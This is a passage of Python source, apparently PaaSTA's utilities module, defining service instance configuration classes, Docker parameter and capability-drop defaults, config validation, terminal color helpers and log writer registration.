# OF IT IN OTHER LIBRARIES (i.e. service_configuration_lib).
# It's used to compose a job's full ID from its name and instance
SPACER = "."
INFRA_ZK_PATH = "/nail/etc/zookeeper_discovery/infrastructure/"
PATH_TO_SYSTEM_PAASTA_CONFIG_DIR = os.environ.get(
"PAASTA_SYSTEM_CONFIG_DIR", "/etc/paasta/"
)
DEFAULT_SOA_DIR = service_configuration_lib.DEFAULT_SOA_DIR
AUTO_SOACONFIG_SUBDIR = "autotuned_defaults"
DEFAULT_DOCKERCFG_LOCATION = "file:///root/.dockercfg"
DEPLOY_PIPELINE_NON_DEPLOY_STEPS = (
"itest",
"itest-and-push-to-registry",
"security-check",
"performance-check",
"push-to-registry",
)
# Default values for _log
ANY_CLUSTER = "N/A"
ANY_INSTANCE = "N/A"
DEFAULT_LOGLEVEL = "event"
no_escape = re.compile(r"\x1B\[[0-9;]*[mK]")
# instead of the convention of using underscores in this scribe channel name,
# the audit log uses dashes to prevent collisions with a service that might be
# named 'audit_log'
AUDIT_LOG_STREAM = "stream_paasta-audit-log"
DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT = (
"http://{host:s}:{port:d}/;csv;norefresh;scope={scope:s}"
)
DEFAULT_CPU_PERIOD = 100000
DEFAULT_CPU_BURST_ADD = 1
DEFAULT_SOA_CONFIGS_GIT_URL = "sysgit.yelpcorp.com"
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
INSTANCE_TYPES = (
"marathon",
"paasta_native",
"adhoc",
"kubernetes",
"tron",
"flink",
"cassandracluster",
"kafkacluster",
"nrtsearchservice",
)
CAPS_DROP = [
"SETPCAP",
"MKNOD",
"AUDIT_WRITE",
"CHOWN",
"NET_RAW",
"DAC_OVERRIDE",
"FOWNER",
"FSETID",
"KILL",
"SETGID",
"SETUID",
"NET_BIND_SERVICE",
"SYS_CHROOT",
"SETFCAP",
]
class RollbackTypes(Enum):
AUTOMATIC_SLO_ROLLBACK = "automatic_slo_rollback"
USER_INITIATED_ROLLBACK = "user_initiated_rollback"
class TimeCacheEntry(TypedDict):
data: Any
fetch_time: float
_CacheRetT = TypeVar("_CacheRetT")
class time_cache:
def __init__(self, ttl: float = 0) -> None:
self.configs: Dict[Tuple, TimeCacheEntry] = {}
self.ttl = ttl
def __call__(self, f: Callable[..., _CacheRetT]) -> Callable[..., _CacheRetT]:
def cache(*args: Any, **kwargs: Any) -> _CacheRetT:
if "ttl" in kwargs:
ttl = kwargs["ttl"]
del kwargs["ttl"]
else:
ttl = self.ttl
key = args
for item in kwargs.items():
key += item
if (
(not ttl)
or (key not in self.configs)
or (time.time() - self.configs[key]["fetch_time"] > ttl)
):
self.configs[key] = {
"data": f(*args, **kwargs),
"fetch_time": time.time(),
}
return self.configs[key]["data"]
return cache
_SortDictsT = TypeVar("_SortDictsT", bound=Mapping)
def sort_dicts(dcts: Iterable[_SortDictsT]) -> List[_SortDictsT]:
def key(dct: _SortDictsT) -> Tuple:
return tuple(sorted(dct.items()))
return sorted(dcts, key=key)
class InvalidInstanceConfig(Exception):
pass
DeployBlacklist = List[Tuple[str, str]]
DeployWhitelist = Optional[Tuple[str, List[str]]]
# The actual config files will have lists, since tuples are not expressible in base YAML, so we define different types
# here to represent that. The getter functions will convert to the safe versions above.
UnsafeDeployBlacklist = Optional[Sequence[Sequence[str]]]
UnsafeDeployWhitelist = Optional[Sequence[Union[str, Sequence[str]]]]
Constraint = Sequence[str]
# e.g. ['GROUP_BY', 'habitat', 2]. Marathon doesn't like that so we'll convert to Constraint later.
UnstringifiedConstraint = Sequence[Union[str, int, float]]
SecurityConfigDict = Dict # Todo: define me.
class VolumeWithMode(TypedDict):
mode: str
class DockerVolume(VolumeWithMode):
hostPath: str
containerPath: str
class AwsEbsVolume(VolumeWithMode):
volume_id: str
fs_type: str
partition: int
container_path: str
class PersistentVolume(VolumeWithMode):
size: int
container_path: str
storage_class_name: str
class SecretVolumeItem(TypedDict, total=False):
key: str
path: str
mode: Union[str, int]
class SecretVolume(TypedDict, total=False):
secret_name: str
container_path: str
default_mode: Union[str, int]
items: List[SecretVolumeItem]
class MonitoringDict(TypedDict, total=False):
alert_after: Union[str, float]
check_every: str
check_oom_events: bool
component: str
description: str
notification_email: Union[str, bool]
page: bool
priority: str
project: str
realert_every: float
runbook: str
slack_channels: Union[str, List[str]]
tags: List[str]
team: str
ticket: bool
tip: str
class InstanceConfigDict(TypedDict, total=False):
deploy_group: str
mem: float
cpus: float
disk: float
cmd: str
args: List[str]
cfs_period_us: float
cpu_burst_add: float
cap_add: List
env: Dict[str, str]
monitoring: MonitoringDict
deploy_blacklist: UnsafeDeployBlacklist
deploy_whitelist: UnsafeDeployWhitelist
pool: str
persistent_volumes: List[PersistentVolume]
role: str
extra_volumes: List[DockerVolume]
aws_ebs_volumes: List[AwsEbsVolume]
secret_volumes: List[SecretVolume]
security: SecurityConfigDict
dependencies_reference: str
dependencies: Dict[str, Dict]
constraints: List[UnstringifiedConstraint]
extra_constraints: List[UnstringifiedConstraint]
net: str
extra_docker_args: Dict[str, str]
gpus: int
branch: str
class BranchDictV1(TypedDict, total=False):
docker_image: str
desired_state: str
force_bounce: Optional[str]
class BranchDictV2(TypedDict):
git_sha: str
docker_image: str
desired_state: str
force_bounce: Optional[str]
class DockerParameter(TypedDict):
key: str
value: str
def safe_deploy_blacklist(input: UnsafeDeployBlacklist) -> DeployBlacklist:
return [(t, l) for t, l in input]
def safe_deploy_whitelist(input: UnsafeDeployWhitelist) -> DeployWhitelist:
try:
location_type, allowed_values = input
return cast(str, location_type), cast(List[str], allowed_values)
except TypeError:
return None
# For mypy typing
InstanceConfig_T = TypeVar("InstanceConfig_T", bound="InstanceConfig")
class InstanceConfig:
config_filename_prefix: str
def __init__(
self,
cluster: str,
instance: str,
service: str,
config_dict: InstanceConfigDict,
branch_dict: Optional[BranchDictV2],
soa_dir: str = DEFAULT_SOA_DIR,
) -> None:
self.config_dict = config_dict
self.branch_dict = branch_dict
self.cluster = cluster
self.instance = instance
self.service = service
self.soa_dir = soa_dir
self._job_id = compose_job_id(service, instance)
config_interpolation_keys = ("deploy_group",)
interpolation_facts = self.__get_interpolation_facts()
for key in config_interpolation_keys:
if (
key in self.config_dict
and self.config_dict[key] is not None # type: ignore
):
self.config_dict[key] = self.config_dict[key].format( # type: ignore
**interpolation_facts
)
def __repr__(self) -> str:
return "{!s}({!r}, {!r}, {!r}, {!r}, {!r}, {!r})".format(
self.__class__.__name__,
self.service,
self.instance,
self.cluster,
self.config_dict,
self.branch_dict,
self.soa_dir,
)
def __get_interpolation_facts(self) -> Dict[str, str]:
return {
"cluster": self.cluster,
"instance": self.instance,
"service": self.service,
}
def get_cluster(self) -> str:
return self.cluster
def get_instance(self) -> str:
return self.instance
def get_service(self) -> str:
return self.service
@property
def job_id(self) -> str:
return self._job_id
def get_docker_registry(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> str:
return get_service_docker_registry(
self.service, self.soa_dir, system_config=system_paasta_config
)
def get_branch(self) -> str:
return get_paasta_branch(
cluster=self.get_cluster(), instance=self.get_instance()
)
def get_deploy_group(self) -> str:
return self.config_dict.get("deploy_group", self.get_branch())
def get_team(self) -> str:
return self.config_dict.get("monitoring", {}).get("team", None)
def get_mem(self) -> float:
"""Gets the memory required from the service's configuration.
Defaults to 4096 (4G) if no value specified in the config.
:returns: The amount of memory specified by the config, 4096 if not specified"""
mem = self.config_dict.get("mem", 4096)
return mem
def get_mem_swap(self) -> str:
"""Gets the memory-swap value. This value is passed to the docker
container to ensure that the total memory limit (memory + swap) is the
same value as the 'mem' key in soa-configs. Note - this value *has* to
be >= to the mem key, so we always round up to the closest MB and add
additional 64MB for the docker executor (See PAASTA-12450).
"""
mem = self.get_mem()
mem_swap = int(math.ceil(mem + 64))
return "%sm" % mem_swap
def get_cpus(self) -> float:
"""Gets the number of cpus required from the service's configuration.
Defaults to 1 cpu if no value specified in the config.
:returns: The number of cpus specified in the config, 1 if not specified"""
cpus = self.config_dict.get("cpus", 1)
return cpus
def get_cpu_burst_add(self) -> float:
"""Returns the number of additional cpus a container is allowed to use.
Defaults to DEFAULT_CPU_BURST_ADD"""
return self.config_dict.get("cpu_burst_add", DEFAULT_CPU_BURST_ADD)
def get_cpu_period(self) -> float:
"""The --cpu-period option to be passed to docker
Comes from the cfs_period_us configuration option
:returns: The number to be passed to the --cpu-period docker flag"""
return self.config_dict.get("cfs_period_us", DEFAULT_CPU_PERIOD)
def get_cpu_quota(self) -> float:
"""Gets the --cpu-quota option to be passed to docker
Calculation: (cpus + cpus_burst_add) * cfs_period_us
:returns: The number to be passed to the --cpu-quota docker flag"""
cpu_burst_add = self.get_cpu_burst_add()
return (self.get_cpus() + cpu_burst_add) * self.get_cpu_period()
def get_extra_docker_args(self) -> Dict[str, str]:
return self.config_dict.get("extra_docker_args", {})
def get_cap_add(self) -> Iterable[DockerParameter]:
"""Get the --cap-add options to be passed to docker
Generated from the cap_add configuration option, which is a list of
capabilities.
Example configuration: {'cap_add': ['IPC_LOCK', 'SYS_PTRACE']}
:returns: A generator of cap_add options to be passed as --cap-add flags"""
for value in self.config_dict.get("cap_add", []):
yield {"key": "cap-add", "value": f"{value}"}
def get_cap_drop(self) -> Iterable[DockerParameter]:
"""Generates --cap-drop options to be passed to docker by default, which
makes them not able to perform special privilege escalation stuff
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
"""
for cap in CAPS_DROP:
yield {"key": "cap-drop", "value": cap}
def format_docker_parameters(
self,
with_labels: bool = True,
system_paasta_config: Optional["SystemPaastaConfig"] = None,
) -> List[DockerParameter]:
"""Formats extra flags for running docker. Will be added in the format
`["--%s=%s" % (e['key'], e['value']) for e in list]` to the `docker run` command
Note: values must be strings
:param with_labels: Whether to build docker parameters with or without labels
:returns: A list of parameters to be added to docker run"""
parameters: List[DockerParameter] = [
{"key": "memory-swap", "value": self.get_mem_swap()},
{"key": "cpu-period", "value": "%s" % int(self.get_cpu_period())},
{"key": "cpu-quota", "value": "%s" % int(self.get_cpu_quota())},
]
if self.use_docker_disk_quota(system_paasta_config=system_paasta_config):
parameters.append(
{
"key": "storage-opt",
"value": f"size={int(self.get_disk() * 1024 * 1024)}",
}
)
if with_labels:
parameters.extend(
[
{"key": "label", "value": "paasta_service=%s" % self.service},
{"key": "label", "value": "paasta_instance=%s" % self.instance},
]
)
extra_docker_args = self.get_extra_docker_args()
if extra_docker_args:
for key, value in extra_docker_args.items():
parameters.extend([{"key": key, "value": value}])
parameters.extend(self.get_cap_add())
parameters.extend(self.get_docker_init())
parameters.extend(self.get_cap_drop())
return parameters
def use_docker_disk_quota(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> bool:
if system_paasta_config is None:
system_paasta_config = load_system_paasta_config()
return system_paasta_config.get_enforce_disk_quota()
def get_docker_init(self) -> Iterable[DockerParameter]:
return [{"key": "init", "value": "true"}]
def get_disk(self, default: float = 1024) -> float:
"""Gets the amount of disk space in MiB required from the service's configuration.
Defaults to 1024 (1GiB) if no value is specified in the config.
:returns: The amount of disk space specified by the config, 1024 MiB if not specified"""
disk = self.config_dict.get("disk", default)
return disk
def get_gpus(self) -> Optional[int]:
"""Gets the number of gpus required from the service's configuration.
Default to None if no value is specified in the config.
:returns: The number of gpus specified by the config, 0 if not specified"""
gpus = self.config_dict.get("gpus", None)
return gpus
def get_container_type(self) -> Optional[str]:
"""Get Mesos containerizer type.
Default to DOCKER if gpus are not used.
:returns: Mesos containerizer type, DOCKER or MESOS"""
if self.get_gpus() is not None:
container_type = "MESOS"
else:
container_type = "DOCKER"
return container_type
def get_cmd(self) -> Optional[Union[str, List[str]]]:
"""Get the docker cmd specified in the service's configuration.
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("cmd", None)
def get_instance_type(self) -> Optional[str]:
return getattr(self, "config_filename_prefix", None)
def get_env_dictionary(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> Dict[str, str]:
"""A dictionary of key/value pairs that represent environment variables
to be injected to the container environment"""
env = {
"PAASTA_SERVICE": self.service,
"PAASTA_INSTANCE": self.instance,
"PAASTA_CLUSTER": self.cluster,
"PAASTA_DEPLOY_GROUP": self.get_deploy_group(),
"PAASTA_DOCKER_IMAGE": self.get_docker_image(),
"PAASTA_RESOURCE_CPUS": str(self.get_cpus()),
"PAASTA_RESOURCE_MEM": str(self.get_mem()),
"PAASTA_RESOURCE_DISK": str(self.get_disk()),
}
if self.get_gpus() is not None:
env["PAASTA_RESOURCE_GPUS"] = str(self.get_gpus())
try:
env["PAASTA_GIT_SHA"] = get_git_sha_from_dockerurl(
self.get_docker_url(system_paasta_config=system_paasta_config)
)
except Exception:
pass
team = self.get_team()
if team:
env["PAASTA_MONITORING_TEAM"] = team
instance_type = self.get_instance_type()
if instance_type:
env["PAASTA_INSTANCE_TYPE"] = instance_type
user_env = self.config_dict.get("env", {})
env.update(user_env)
return {str(k): str(v) for (k, v) in env.items()}
def get_env(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> Dict[str, str]:
"""Basic get_env that simply returns the basic env, other classes
might need to override this getter for more implementation-specific
env getting"""
return self.get_env_dictionary(system_paasta_config=system_paasta_config)
def get_args(self) -> Optional[List[str]]:
"""Get the docker args specified in the service's configuration.
If not specified in the config and if cmd is not specified, defaults to an empty array.
If not specified in the config but cmd is specified, defaults to null.
If specified in the config and if cmd is also specified, throws an exception. Only one may be specified.
:param service_config: The service instance's configuration dictionary
:returns: An array of args specified in the config,
``[]`` if not specified and if cmd is not specified,
otherwise None if not specified but cmd is specified"""
if self.get_cmd() is None:
return self.config_dict.get("args", [])
else:
args = self.config_dict.get("args", None)
if args is None:
return args
else:
# TODO validation stuff like this should be moved into a check_*
raise InvalidInstanceConfig(
"Instance configuration can specify cmd or args, but not both."
)
def get_monitoring(self) -> MonitoringDict:
"""Get monitoring overrides defined for the given instance"""
return self.config_dict.get("monitoring", {})
def get_deploy_constraints(
self,
blacklist: DeployBlacklist,
whitelist: DeployWhitelist,
system_deploy_blacklist: DeployBlacklist,
system_deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Return the combination of deploy_blacklist and deploy_whitelist
as a list of constraints.
"""
return (
deploy_blacklist_to_constraints(blacklist)
+ deploy_whitelist_to_constraints(whitelist)
+ deploy_blacklist_to_constraints(system_deploy_blacklist)
+ deploy_whitelist_to_constraints(system_deploy_whitelist)
)
def get_deploy_blacklist(self) -> DeployBlacklist:
"""The deploy blacklist is a list of lists, where the lists indicate
which locations the service should not be deployed"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""The deploy whitelist is a tuple of (location_type, [allowed value, allowed value, ...]).
To have tasks scheduled on it, a host must be covered by the deploy whitelist (if present) and not excluded by
the deploy blacklist."""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_docker_image(self) -> str:
"""Get the docker image name (with tag) for a given service branch from
a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["docker_image"]
else:
return ""
def get_docker_url(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> str:
"""Compose the docker url.
:returns: '<registry_uri>/<docker_image>'
"""
registry_uri = self.get_docker_registry(
system_paasta_config=system_paasta_config
)
docker_image = self.get_docker_image()
if not docker_image:
raise NoDockerImageError(
"Docker url not available because there is no docker_image"
)
docker_url = f"{registry_uri}/{docker_image}"
return docker_url
def get_desired_state(self) -> str:
"""Get the desired state (either 'start' or 'stop') for a given service
branch from a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["desired_state"]
else:
return "start"
def get_force_bounce(self) -> Optional[str]:
"""Get the force_bounce token for a given service branch from a generated
deployments.json file. This is a token that, when changed, indicates that
the instance should be recreated and bounced, even if no other
parameters have changed. This may be None or a string, generally a
timestamp.
"""
if self.branch_dict is not None:
return self.branch_dict["force_bounce"]
else:
return None
def check_cpus(self) -> Tuple[bool, str]:
cpus = self.get_cpus()
if cpus is not None:
if not isinstance(cpus, (float, int)):
return (
False,
'The specified cpus value "%s" is not a valid float or int.' % cpus,
)
return True, ""
def check_mem(self) -> Tuple[bool, str]:
mem = self.get_mem()
if mem is not None:
if not isinstance(mem, (float, int)):
return (
False,
'The specified mem value "%s" is not a valid float or int.' % mem,
)
return True, ""
def check_disk(self) -> Tuple[bool, str]:
disk = self.get_disk()
if disk is not None:
if not isinstance(disk, (float, int)):
return (
False,
'The specified disk value "%s" is not a valid float or int.' % disk,
)
return True, ""
def check_security(self) -> Tuple[bool, str]:
security = self.config_dict.get("security")
if security is None:
return True, ""
inbound_firewall = security.get("inbound_firewall")
outbound_firewall = security.get("outbound_firewall")
if inbound_firewall is None and outbound_firewall is None:
return True, ""
if inbound_firewall is not None and inbound_firewall not in (
"allow",
"reject",
):
return (
False,
'Unrecognized inbound_firewall value "%s"' % inbound_firewall,
)
if outbound_firewall is not None and outbound_firewall not in (
"block",
"monitor",
):
return (
False,
'Unrecognized outbound_firewall value "%s"' % outbound_firewall,
)
unknown_keys = set(security.keys()) - {
"inbound_firewall",
"outbound_firewall",
}
if unknown_keys:
return (
False,
'Unrecognized items in security dict of service config: "%s"'
% ",".join(unknown_keys),
)
return True, ""
def check_dependencies_reference(self) -> Tuple[bool, str]:
dependencies_reference = self.config_dict.get("dependencies_reference")
if dependencies_reference is None:
return True, ""
dependencies = self.config_dict.get("dependencies")
if dependencies is None:
return (
False,
'dependencies_reference "%s" declared but no dependencies found'
% dependencies_reference,
)
if dependencies_reference not in dependencies:
return (
False,
'dependencies_reference "%s" not found in dependencies dictionary'
% dependencies_reference,
)
return True, ""
def check(self, param: str) -> Tuple[bool, str]:
check_methods = {
"cpus": self.check_cpus,
"mem": self.check_mem,
"security": self.check_security,
"dependencies_reference": self.check_dependencies_reference,
"deploy_group": self.check_deploy_group,
}
check_method = check_methods.get(param)
if check_method is not None:
return check_method()
else:
return (
False,
'Your service config specifies "%s", an unsupported parameter.' % param,
)
def validate(self, params: Optional[List[str]] = None,) -> List[str]:
if params is None:
params = [
"cpus",
"mem",
"security",
"dependencies_reference",
"deploy_group",
]
error_msgs = []
for param in params:
check_passed, check_msg = self.check(param)
if not check_passed:
error_msgs.append(check_msg)
return error_msgs
def check_deploy_group(self) -> Tuple[bool, str]:
deploy_group = self.get_deploy_group()
if deploy_group is not None:
pipeline_deploy_groups = get_pipeline_deploy_groups(
service=self.service, soa_dir=self.soa_dir
)
if deploy_group not in pipeline_deploy_groups:
return (
False,
f"{self.service}.{self.instance} uses deploy_group {deploy_group}, but it is not deploy.yaml",
) # noqa: E501
return True, ""
def get_extra_volumes(self) -> List[DockerVolume]:
"""Extra volumes are a specially formatted list of dictionaries that should
be bind mounted in a container The format of the dictionaries should
conform to the `Mesos container volumes spec
<https://mesosphere.github.io/marathon/docs/native-docker.html>`_"""
return self.config_dict.get("extra_volumes", [])
def get_aws_ebs_volumes(self) -> List[AwsEbsVolume]:
return self.config_dict.get("aws_ebs_volumes", [])
def get_secret_volumes(self) -> List[SecretVolume]:
return self.config_dict.get("secret_volumes", [])
def get_role(self) -> Optional[str]:
"""Which mesos role of nodes this job should run on.
"""
return self.config_dict.get("role")
def get_pool(self) -> str:
"""Which pool of nodes this job should run on. This can be used to mitigate noisy neighbors, by putting
particularly noisy or noise-sensitive jobs into different pools.
This is implemented with an attribute "pool" on each mesos slave and by adding a constraint or node selector.
Eventually this may be implemented with Mesos roles, once a framework can register under multiple roles.
:returns: the "pool" attribute in your config dict, or the string "default" if not specified."""
return self.config_dict.get("pool", "default")
def get_pool_constraints(self) -> List[Constraint]:
pool = self.get_pool()
return [["pool", "LIKE", pool]]
def get_constraints(self) -> Optional[List[Constraint]]:
return stringify_constraints(self.config_dict.get("constraints", None))
def get_extra_constraints(self) -> List[Constraint]:
return stringify_constraints(self.config_dict.get("extra_constraints", []))
def get_net(self) -> str:
"""
:returns: the docker networking mode the container should be started with.
"""
return self.config_dict.get("net", "bridge")
def get_volumes(self, system_volumes: Sequence[DockerVolume]) -> List[DockerVolume]:
volumes = list(system_volumes) + list(self.get_extra_volumes())
return _reorder_docker_volumes(volumes)
def get_persistent_volumes(self) -> Sequence[PersistentVolume]:
return self.config_dict.get("persistent_volumes", [])
def get_dependencies_reference(self) -> Optional[str]:
"""Get the reference to an entry in dependencies.yaml
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("dependencies_reference")
def get_dependencies(self) -> Optional[Dict]:
"""Get the contents of the dependencies_dict pointed to by the dependency_reference or
'main' if no dependency_reference exists
Defaults to None if not specified in the config.
:returns: A list of dictionaries specified in the dependencies_dict, None if not specified"""
dependencies = self.config_dict.get("dependencies")
if not dependencies:
return None
dependency_ref = self.get_dependencies_reference() or "main"
return dependencies.get(dependency_ref)
def get_inbound_firewall(self) -> Optional[str]:
"""Return 'allow', 'reject', or None as configured in security->inbound_firewall
Defaults to None if not specified in the config
Setting this to a value other than `allow` is uncommon, as doing so will restrict the
availability of your service. The only other supported value is `reject` currently,
which will reject all remaining inbound traffic to the service port after all other rules.
This option exists primarily for sensitive services that wish to opt into this functionality.
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("inbound_firewall")
def get_outbound_firewall(self) -> Optional[str]:
"""Return 'block', 'monitor', or None as configured in security->outbound_firewall
Defaults to None if not specified in the config
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("outbound_firewall")
def __eq__(self, other: Any) -> bool:
if isinstance(other, type(self)):
return (
self.config_dict == other.config_dict
and self.branch_dict == other.branch_dict
and self.cluster == other.cluster
and self.instance == other.instance
and self.service == other.service
)
else:
return False
def stringify_constraint(usc: UnstringifiedConstraint) -> Constraint:
return [str(x) for x in usc]
def stringify_constraints(
uscs: Optional[List[UnstringifiedConstraint]],
) -> List[Constraint]:
if uscs is None:
return None
return [stringify_constraint(usc) for usc in uscs]
@time_cache(ttl=60)
def validate_service_instance(
service: str, instance: str, cluster: str, soa_dir: str
) -> str:
possibilities: List[str] = []
for instance_type in INSTANCE_TYPES:
sis = get_service_instance_list(
service=service,
cluster=cluster,
instance_type=instance_type,
soa_dir=soa_dir,
)
if (service, instance) in sis:
return instance_type
possibilities.extend(si[1] for si in sis)
else:
suggestions = suggest_possibilities(word=instance, possibilities=possibilities)
raise NoConfigurationForServiceError(
f"Error: {compose_job_id(service, instance)} doesn't look like it has been configured "
f"to run on the {cluster} cluster.{suggestions}"
)
_ComposeRetT = TypeVar("_ComposeRetT")
_ComposeInnerRetT = TypeVar("_ComposeInnerRetT")
def compose(
func_one: Callable[[_ComposeInnerRetT], _ComposeRetT],
func_two: Callable[..., _ComposeInnerRetT],
) -> Callable[..., _ComposeRetT]:
def composed(*args: Any, **kwargs: Any) -> _ComposeRetT:
return func_one(func_two(*args, **kwargs))
return composed
class PaastaColors:
"""Collection of static variables and methods to assist in coloring text."""
# ANSI color codes
BLUE = "\033[34m"
BOLD = "\033[1m"
CYAN = "\033[36m"
DEFAULT = "\033[0m"
GREEN = "\033[32m"
GREY = "\033[38;5;242m"
MAGENTA = "\033[35m"
RED = "\033[31m"
YELLOW = "\033[33m"
@staticmethod
def bold(text: str) -> str:
"""Return bolded text.
:param text: a string
:return: text color coded with ANSI bold
"""
return PaastaColors.color_text(PaastaColors.BOLD, text)
@staticmethod
def blue(text: str) -> str:
"""Return text that can be printed blue.
:param text: a string
:return: text color coded with ANSI blue
"""
return PaastaColors.color_text(PaastaColors.BLUE, text)
@staticmethod
def green(text: str) -> str:
"""Return text that can be printed green.
:param text: a string
:return: text color coded with ANSI green"""
return PaastaColors.color_text(PaastaColors.GREEN, text)
@staticmethod
def red(text: str) -> str:
"""Return text that can be printed red.
:param text: a string
:return: text color coded with ANSI red"""
return PaastaColors.color_text(PaastaColors.RED, text)
@staticmethod
def magenta(text: str) -> str:
"""Return text that can be printed magenta.
:param text: a string
:return: text color coded with ANSI magenta"""
return PaastaColors.color_text(PaastaColors.MAGENTA, text)
@staticmethod
def color_text(color: str, text: str) -> str:
"""Return text that can be printed color.
:param color: ANSI color code
:param text: a string
:return: a string with ANSI color encoding"""
# any time text returns to default, we want to insert our color.
replaced = text.replace(PaastaColors.DEFAULT, PaastaColors.DEFAULT + color)
# then wrap the beginning and end in our color/default.
return color + replaced + PaastaColors.DEFAULT
@staticmethod
def cyan(text: str) -> str:
"""Return text that can be printed cyan.
:param text: a string
:return: text color coded with ANSI cyan"""
return PaastaColors.color_text(PaastaColors.CYAN, text)
@staticmethod
def yellow(text: str) -> str:
"""Return text that can be printed yellow.
:param text: a string
:return: text color coded with ANSI yellow"""
return PaastaColors.color_text(PaastaColors.YELLOW, text)
@staticmethod
def grey(text: str) -> str:
return PaastaColors.color_text(PaastaColors.GREY, text)
@staticmethod
def default(text: str) -> str:
return PaastaColors.color_text(PaastaColors.DEFAULT, text)
LOG_COMPONENTS: Mapping[str, Mapping[str, Any]] = OrderedDict(
[
(
"build",
{
"color": PaastaColors.blue,
"help": (
"Logs for pre-deployment steps, such as itests, "
"image building, and security checks."
),
"source_env": "devc",
},
),
(
"deploy",
{
"color": PaastaColors.cyan,
"help": (
"Logs for deployment steps and actions, such as "
"bouncing, start/stop/restart, and instance cleanup."
),
"additional_source_envs": ["devc"],
},
),
(
"monitoring",
{
"color": PaastaColors.green,
"help": "Logs from Sensu checks for the service",
},
),
(
"marathon",
{
"color": PaastaColors.magenta,
"help": "Logs from Marathon for the service (deprecated).",
},
),
(
"app_output",
{
"color": compose(PaastaColors.yellow, PaastaColors.bold),
"help": (
"Stderr and stdout from a service's running processes. "
"Alias for both the stdout and stderr components."
),
},
),
(
"stdout",
{
"color": PaastaColors.yellow,
"help": "Stdout from a service's running processes.",
},
),
(
"stderr",
{
"color": PaastaColors.yellow,
"help": "Stderr from a service's running processes.",
},
),
(
"security",
{
"color": PaastaColors.red,
"help": "Logs from security-related services such as firewall monitoring",
},
),
("oom", {"color": PaastaColors.red, "help": "Kernel OOM events."}),
(
"task_lifecycle",
{
"color": PaastaColors.bold,
"help": "Logs that tell you about task startup, failures, healthchecks, etc.",
},
),
# I'm leaving these planned components here since they provide some hints
# about where we want to go. See PAASTA-78.
#
# But I'm commenting them out so they don't delude users into believing we
# can expose logs that we cannot actually expose. See PAASTA-927.
#
# ('app_request', {
# 'color': PaastaColors.bold,
# 'help': 'The request log for the service. Defaults to "service_NAME_requests"',
# 'command': 'scribe_reader -e ENV -f service_example_happyhour_requests',
# }),
# ('app_errors', {
# 'color': PaastaColors.red,
# 'help': 'Application error log, defaults to "stream_service_NAME_errors"',
# 'command': 'scribe_reader -e ENV -f stream_service_SERVICE_errors',
# }),
# ('lb_requests', {
# 'color': PaastaColors.bold,
# 'help': 'All requests from Smartstack haproxy',
# 'command': 'NA - TODO: SRV-1130',
# }),
# ('lb_errors', {
# 'color': PaastaColors.red,
# 'help': 'Logs from Smartstack haproxy that have 400-500 error codes',
# 'command': 'scribereader -e ENV -f stream_service_errors | grep SERVICE.instance',
# }),
]
)
class NoSuchLogComponent(Exception):
pass
def validate_log_component(component: str) -> bool:
if component in LOG_COMPONENTS.keys():
return True
else:
raise NoSuchLogComponent
def get_git_url(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> str:
"""Get the git url for a service. Assumes that the service's
repo matches its name, and that it lives in services- i.e.
if this is called with the string 'test', the returned
url will be git@github.yelpcorp.com:services/test.
:param service: The service name to get a URL for
:returns: A git url to the service's repository"""
general_config = service_configuration_lib.read_service_configuration(
service, soa_dir=soa_dir
)
# TODO: PAASTA-16927: get this from system config `.git_config`
default_location = format_git_url(
"git", "github.yelpcorp.com", f"services/{service}"
)
return general_config.get("git_url", default_location)
def format_git_url(git_user: str, git_server: str, repo_name: str) -> str:
return f"{git_user}@{git_server}:{repo_name}"
def get_service_docker_registry(
service: str,
soa_dir: str = DEFAULT_SOA_DIR,
system_config: Optional["SystemPaastaConfig"] = None,
) -> str:
if service is None:
raise NotImplementedError('"None" is not a valid service')
service_configuration = service_configuration_lib.read_service_configuration(
service, soa_dir
)
try:
return service_configuration["docker_registry"]
except KeyError:
if not system_config:
system_config = load_system_paasta_config()
return system_config.get_system_docker_registry()
class NoSuchLogLevel(Exception):
pass
class LogWriterConfig(TypedDict):
driver: str
options: Dict
class LogReaderConfig(TypedDict):
driver: str
options: Dict
# The active log writer.
_log_writer = None
# The map of name -> LogWriter subclasses, used by configure_log.
_log_writer_classes = {}
class LogWriter:
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
_LogWriterTypeT = TypeVar("_LogWriterTypeT", bound=Type[LogWriter])
def register_log_writer(name: str) -> Callable[[_LogWriterTypeT], _LogWriterTypeT]:
"""Returns a decorator that registers that log writer class at a given name
so get_log_writer_class can find it."""
def outer(log_writer_class: _LogWriterTypeT) -> _LogWriterTypeT:
_log_writer_classes[name] = log_writer_class
return log_writer_class
return outer
def get_log_writer_class(name: str) -> Type[LogWriter]:
return _log_writer_classes[name]
def list_log_writers() -> Iterable[str]:
return _log_writer_classes.keys()
def configure_log() -> None:
"""We will log to the yocalhost binded scribe."""
log_writer_config = load_system_paasta_config().get_log_writer()
global _log_writer
LogWriterClass = get_log_writer_class(log_writer_config["driver"])
